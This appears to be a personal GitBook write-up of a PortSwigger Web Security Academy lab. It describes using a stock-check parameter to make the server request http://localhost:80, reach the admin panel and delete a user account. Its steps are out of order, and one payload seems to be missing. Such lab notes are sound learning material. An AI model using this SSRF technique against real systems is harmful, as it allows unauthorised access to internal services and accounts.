public
  • Description
    • Whoami
  • 💻Plataform
    • Portswigger Academy
      • SQL Injection
        • SQL Injection Authentication Bypass
        • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
        • Blind SQL injection with conditional errors
      • SSRF
        • Lab 1: Basic SSRF against the local server
      • XSS ( Cross-Site Scripting )
      • IDOR
      • Insecure Deserialization
      • JWT ( Json Web Token )
      • Access Control Vulnerabilities
      • Directory Traversal
      • OS Command Injection
    • ROP Emporium
      • Ret2Win
      • Split
      • Callme
  • By Topics
    • Cryptography
      • Mini RSA
Powered by GitBook
On this page
  1. Plataform
  2. Portswigger Academy
  3. SSRF

Lab 1: Basic SSRF against the local server

Lab 1 regarding the Server-Side Request Forgery (SSRF) vulnerability from PortSwigger.

PreviousSSRFNextXSS ( Cross-Site Scripting )

Last updated 1 year ago

Basically, we have an application with multiple products. By clicking on "View details" and then clicking on "Check stock," the product's inventory will be verified.

When testing the /admin endpoint, the application returned the administrative panel. Upon observing the response, we can identify the presence of two users, "carlos" and "wiener," followed by an href referencing the path to delete one of the users.

After finding the required endpoint to delete the account, we can easily do it using the "stockApi" parameter, and the lab will be successfully completed!

However, upon analyzing the request with Burp Suite and testing the "stockApi" parameter, when we input "," the internal application is exactly returned. Therefore, we are able to interact with the internal environment. To solve the lab, we need to delete the user "carlos."

💻
http://localhost:80
LogoLab: Basic SSRF against the local server | Web Security AcademyWebSecAcademy
Lab